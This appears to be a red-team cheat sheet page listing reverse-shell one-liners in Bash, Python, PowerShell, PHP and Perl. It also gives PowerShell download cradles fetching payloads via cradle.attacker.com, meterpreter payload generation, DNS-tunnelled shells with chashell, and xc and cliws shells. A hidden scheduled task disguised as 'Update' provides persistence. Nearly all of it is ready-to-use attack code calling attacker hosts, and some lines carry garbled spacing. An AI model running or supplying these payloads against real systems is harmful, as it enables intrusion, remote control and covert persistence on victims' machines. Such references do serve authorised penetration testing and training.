Bash
Copy /bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
rm /tmp/f ; mkfifo /tmp/f ; cat /tmp/f | /bin/sh -i 2>&1| nc < LHOS T > < LPOR T > > /tmp/f
Python
IPv4
Copy import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()
IPv6
Copy import socket,subprocess,os;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);s.close()
import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv("HISTFILE","/dev/null");pty.spawn("/bin/bash");s.close()
PowerShell
Copy $client = New-Object System.Net.Sockets.TCPClient("10.10.13.37",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Copy $socket = new-object System.Net.Sockets.TcpClient( "10.10.13.37" , 1337 );
if ($socket -eq $null ){ exit 1 }
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024 ;
$encoding = new-object System.Text.AsciiEncoding;
do
{
$writer.Flush();
$read = $null ;
$res = ""
while ($stream.DataAvailable -or $read -eq $null ) {
$read = $stream.Read($buffer , 0 , 1024 )
}
$out = $encoding.GetString($buffer , 0 , $read).Replace( "`r`n" , "" ).Replace( "`n" , "" );
if ( ! $out.equals( "exit" )){
$args = "" ;
if ($out.IndexOf( ' ' ) -gt -1 ){
$args = $out.substring($out.IndexOf( ' ' ) +1 );
$out = $out.substring( 0 , $out.IndexOf( ' ' ));
if ( $args.split ( ' ' ).length -gt 1 ){
$pinfo = New-Object System.Diagnostics.ProcessStartInfo
$pinfo.FileName = "cmd.exe"
$pinfo.RedirectStandardError = $true
$pinfo.RedirectStandardOutput = $true
$pinfo.UseShellExecute = $false
$pinfo.Arguments = "/c $out $args "
$p = New-Object System.Diagnostics.Process
$p.StartInfo = $pinfo
$p.Start() | Out-Null
$p.WaitForExit()
$stdout = $p.StandardOutput.ReadToEnd()
$stderr = $p.StandardError.ReadToEnd()
if ($p.ExitCode -ne 0 ) {
$res = $stderr
} else {
$res = $stdout
}
}
else {
$res = ( & "$out" " $args " ) | out-string ;
}
}
else {
$res = ( & "$out" ) | out-string ;
}
if ($res -ne $null ){
$writer.WriteLine($res)
}
}
} While ( ! $out.equals( "exit" ))
$writer.close();
$socket.close();
$stream.Dispose()
#$a=New-Object System.Net.Sockets.TcpClient("10.10.13.37",1337);if($a -eq $null){exit 1}$b=$a.GetStream();$c=New-Object System.IO.StreamWriter($b);$d=New-Object System.Byte[] 1024;$e=New-Object System.Text.AsciiEncoding;do{$c.Flush();$f=$null;$g="";while($b.DataAvailable -or $f -eq $null) {$f=$b.Read($d,0,1024)}$h=$e.GetString($d,0,$f).Replace("`r`n","").Replace("`n","");if(!$h.equals("exit")){$i="";if($h.IndexOf(" ") -gt -1){$i=$h.Substring($h.IndexOf(" ")+1);$h=$h.Substring(0,$h.IndexOf(" "));if($i.Split(" ").Length -gt 1){$k=New-Object System.Diagnostics.ProcessStartInfo;$k.FileName="cmd.exe";$k.RedirectStandardError=$true;$k.RedirectStandardOutput=$true;$k.UseShellExecute=$false;$k.Arguments="/c $h $i";$p=New-Object System.Diagnostics.Process;$p.StartInfo=$k;$p.Start()|Out-Null;$p.WaitForExit();$l=$p.StandardOutput.ReadToEnd();$m=$p.StandardError.ReadToEnd();if($p.ExitCode -ne 0){$g=$m}else{$g=$l}}else{$g=(&"$h" "$i")|Out-String;}}else{$g=(&"$h")|Out-String;}if($g -ne $null){$c.WriteLine($g)}}}while(!$h.equals("exit"))$c.close();$a.close();$b.Dispose()
Download Cradles
PowerShell DNS Delivery
Copy 'powershell $a=""""http://10.10.13.37/payload.txt"""";iex(Resolve-DnsName """"cradle.attacker.com"""" 16).Strings[0]'
wmiexec.py -silentcommand -nooutput megacorp.local/snovvcrash:'Passw0rd!'@PC01.megacorp.local 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe $url=""""http://10.10.13.37/run.ps1"""";iex(resolve-dnsname """"cradle.attacker.com"""" 16).strings[0];Invoke-RunPayload http://10.10.13.37/payload.txt'
PHP
Copy <? php echo passthru ( "/bin/bash -c '/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'" ) ; ?>
Perl
Copy use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};
C
C#
Netcat
Copy $ {nc.tradentional|nc|ncat|netcat} <LHOST> <LPORT> {-e|-c} /bin/bash
Meterpreter
unicorn
Copy $ python3 unicorn.py windows/meterpreter/reverse_https 10.10.13.37 443
$ sudo msfconsole -qr unicorn.rc
PS > IEX(New-Object Net.WebClient).DownloadString('powershell_attack.txt')
Listeners
Copy $ {nc.tradentional|nc|ncat|netcat} [-6] -lvnp <LPORT>
Transport over DNS
dnscat2
chashell
Buy and configure DNS (e. g., c2cdomain.net
):
Copy A * -> <IP>
A @ -> <IP>
A chashell -> <IP>
NS c -> chashell.c2cdomain.net
Get dependencies:
Copy $ export GOPATH=/home/snovvcrash/code/go
$ export PATH=$GOPATH:$GOPATH/bin:$PATH
$ go get -v -u github.com/golang/dep/cmd/dep
$ go get github.com/mitchellh/gox
$ cd $GOPATH/src/github.com/golang/dep
$ go install ./...
Clone chashell into $GOPATH/src
(otherwise, dep
will error out):
Copy $ git clone https://github.com/sysdream/chashell $GOPATH/src/chashell
$ cd $GOPATH/src/chashell
Build binaries:
Copy $ export ENCRYPTION_KEY=$(python -c 'from os import urandom; print(urandom(32).encode("hex"))')
$ export DOMAIN_NAME=c.c2cdomain.net
$ make build-all OSARCH="linux/amd64"
Run server on Attacker:
Copy $ cd release/
$ sudo systemctl stop systemd-resolved
$ sudo ./chaserv_linux_amd64
Run client on Victim:
Copy $ ./chashell_linux_amd64
Tools
VbRev
xc
Listen:
Copy $ rlwrap ./xc -l -p 443
Launch:
Copy PS > Start-Process -NoNewWindow .\xc.exe "10.10.13.38 443"
cliws
Reverse mode:
Copy $ rlwrap -cAr ./cliws -l 8000
Cmd > .\cliws.exe -r ws://10.10.13.37:8000 powershell
Create a scheduled task for persistence:
Copy $ while true; do sudo netstat - tulpan | grep LISTEN | grep 8080 > / dev / null || rlwrap - cAr . / cliws - l 8080 ; done
$trigger = New-ScheduledTaskTrigger - Once - At ( Get-Date ) - RepetitionInterval ( New-TimeSpan - Hours 1 )
$settings = New-ScheduledTaskSettingsSet -Hidden - MultipleInstances Queue
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-WindowStyle Hidden C:\Windows\Tasks\cliws.exe -r ws://10.10.13.37:8080 powershell"
Register-ScheduledTask - TaskName "Update" - Trigger $trigger - Settings $settings - Action $action
Last updated 10 months ago